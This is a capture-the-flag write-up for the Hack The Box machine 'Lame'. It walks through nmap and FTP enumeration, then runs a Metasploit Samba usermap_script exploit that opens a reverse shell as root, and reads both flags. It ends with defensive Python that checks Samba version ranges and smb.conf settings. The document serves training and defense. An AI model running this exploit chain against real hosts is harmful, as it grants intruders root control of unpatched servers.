Lame Write-Up

Machine IP -

Initial Phase

We start with a quick nmap scan -

root@kali:~/Desktop/Hack The Box/lame# nmap -F 
Starting Nmap 7.70 ( ) at 2019-04-11 19:17 +04
Nmap scan report for 
Host is up (0.37s latency).
Not shown: 96 filtered ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds

FTP immediately stands out as a possible attack vector, so we try an anonymous login and get in -

root@kali:~/Desktop/Hack The Box/lame# ftp 
Connected to 
220 (vsFTPd 2.3.4)
Name ( anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

The listing shows nothing useful, and changing directories does not work either, so FTP is not worth pursuing further. We can turn to the other ports instead. SSH is out of reach without credentials, so we move on to the Samba ports. Metasploit ships several SMB scanner modules, which we can search for -

msf5 > search scanner/smb

Matching Modules
================

   Name                                              Disclosure Date  Rank    Check  Description
   ----                                              ---------------  ----    -----  -----------
   auxiliary/scanner/smb/impacket/dcomexec           2018-03-19       normal  Yes    DCOM Exec
   auxiliary/scanner/smb/impacket/secretsdump                         normal  Yes    DCOM Exec
   auxiliary/scanner/smb/impacket/wmiexec            2018-03-19       normal  Yes    WMI Exec
   auxiliary/scanner/smb/pipe_auditor                                 normal  Yes    SMB Session Pipe Auditor
   auxiliary/scanner/smb/pipe_dcerpc_auditor                          normal  Yes    SMB Session Pipe DCERPC Auditor
   auxiliary/scanner/smb/psexec_loggedin_users                        normal  Yes    Microsoft Windows Authenticated Logged In Users Enumeration
   auxiliary/scanner/smb/smb1                                         normal  Yes    SMBv1 Protocol Detection
   auxiliary/scanner/smb/smb2                                         normal  Yes    SMB 2.0 Protocol Detection
   auxiliary/scanner/smb/smb_enum_gpp                                 normal  Yes    SMB Group Policy Preference Saved Passwords Enumeration
   auxiliary/scanner/smb/smb_enumshares                               normal  Yes    SMB Share Enumeration
   auxiliary/scanner/smb/smb_enumusers                                normal  Yes    SMB User Enumeration (SAM EnumUsers)
   auxiliary/scanner/smb/smb_enumusers_domain                         normal  Yes    SMB Domain User Enumeration
   auxiliary/scanner/smb/smb_login                                    normal  Yes    SMB Login Check Scanner
   auxiliary/scanner/smb/smb_lookupsid                                normal  Yes    SMB SID User Enumeration (LookupSid)
   auxiliary/scanner/smb/smb_ms17_010                                 normal  Yes    MS17-010 SMB RCE Detection
   auxiliary/scanner/smb/smb_uninit_cred                              normal  Yes    Samba _netr_ServerPasswordSet Uninitialized Credential State
   auxiliary/scanner/smb/smb_version                                  normal  Yes    SMB Version Detection

msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOST 
RHOST => 
msf5 auxiliary(scanner/smb/smb_version) > run

[*]  - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*]  - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This gives us the Samba version: 3.0.20 on Debian.

Attack Phase

Now that the Samba version is known, a simple web search for "samba 3.0.20 exploit" turns up, as its first result, a Metasploit module documented on the Rapid7 website. The module path is given there, so it can be tried directly in Metasploit as follows -

msf5 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOST 
RHOST => 
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP double handler on 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo AyjQ29Pvdsjki9wn;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nAyjQ29Pvdsjki9wn\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2019-04-11 19:29:29 +0400

whoami
root
python -c 'import pty; pty.spawn("/bin/bash");'
root@lame:/# cd /home
cd /home
root@lame:/home# ls
ls
ftp  makis  service  user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
69454a937d94f5f0225ea00acd2e84c5
root@lame:/home/makis# cd /root
cd /root
root@lame:/root# ls
ls
Desktop  root.txt  vnc.log
root@lame:/root# cat root.txt
cat root.txt
92caac3be140ef409e45721348a4e9df

And that is how we obtain a root shell on the box and read both the user and root flags. The shell arrives already as root (as the whoami output shows), so no separate privilege escalation step is needed.
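What that version number means for a defender: the module used above, exploit/multi/samba/usermap_script, targets Samba 3.0.20 through 3.0.25rc3 and only works when the non-default "username map script" option is set in smb.conf. The check below is added here and is not part of the original write-up: it parses the banner that smb_version returned, compares it against that range, and inspects an smb.conf fragment for the option; the fragment and the script path in it are constructed, not taken from the box.

```python
import re

# Range the usermap_script module targets: Samba 3.0.20 through 3.0.25rc3.
# Versions compare as (major, minor, patch, rc); a final release gets rc=inf
# so that it sorts after its own rc builds.
AFFECTED_MIN = (3, 0, 20, float("inf"))
AFFECTED_MAX = (3, 0, 25, 3)
_BANNER_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")

# Constructed smb.conf fragment (not taken from the box) with the risky option set.
SAMPLE_SMB_CONF = """[global]
   workgroup = WORKGROUP
   security = user
   username map script = /etc/samba/scripts/mapusers.sh
"""

def parse_samba_version(banner):
    """Version tuple from a banner such as 'Unix (Samba 3.0.20-Debian)', else None."""
    m = _BANNER_RE.search(banner)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else float("inf"))

def version_in_affected_range(version):
    return AFFECTED_MIN <= version <= AFFECTED_MAX

def username_map_script_enabled(smb_conf):
    """True when an uncommented 'username map script' directive carries a value."""
    for line in smb_conf.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue
        key, _, value = stripped.partition("=")
        if key.strip().lower() == "username map script" and value.strip():
            return True
    return False

def assess(banner, smb_conf):
    """One exposure verdict from the banner plus the server's own smb.conf."""
    version = parse_samba_version(banner)
    if version is None:
        return "unknown: no Samba version in banner"
    if not version_in_affected_range(version):
        return "not affected: version outside 3.0.20-3.0.25rc3"
    if username_map_script_enabled(smb_conf):
        return "exposed: affected version with 'username map script' set"
    return "affected version but option not set: upgrade anyway"
```

Running assess("Unix (Samba 3.0.20-Debian)", SAMPLE_SMB_CONF) reports the host as exposed; the fix on the server side is to remove the option and upgrade past 3.0.25rc3.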